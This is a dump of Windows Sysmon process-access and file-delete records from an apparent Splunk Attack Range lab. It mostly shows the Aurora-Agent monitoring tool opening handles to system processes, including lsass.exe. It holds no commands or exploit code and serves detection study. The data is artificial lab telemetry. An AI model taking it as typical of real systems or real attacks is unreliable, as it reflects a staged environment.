10341000x800000000000000017272Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.743{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017271Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.740{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017270Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.734{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017269Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.725{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017268Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.724{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017267Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.723{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017266Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.718{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017265Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.714{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017264Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.711{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017263Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.710{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017262Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.703{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017261Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.698{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017260Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.696{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017259Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.689{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017258Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.683{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017257Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.664{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017256Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.661{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017255Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.647{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017254Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.639{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017253Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.632{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017252Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.625{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1300-00000000B002}440C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017251Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.615{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1200-00000000B002}1012C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017250Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.590{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1100-00000000B002}952C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017249Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.579{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-1000-00000000B002}944C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017248Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.571{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0F00-00000000B002}908C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017247Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.563{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0E00-00000000B002}900C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017246Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.556{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0D00-00000000B002}780C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017245Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.549{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0C00-00000000B002}728C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017244Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.541{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000017243Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.538{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC43-63C7-0900-00000000B002}572C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 23542300x800000000000000017242Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:24:42.258{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9A32010BEBF4E9404A78D0FFE439573,SHA256=B7DB4094A371603BAA1137D926F222976A4EFCAD1B8D49D76F64B13D3365D645,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000044646Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:24:42.928{FE4C2B44-D9F5-63C7-0C00-00000000AF02}8327004C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 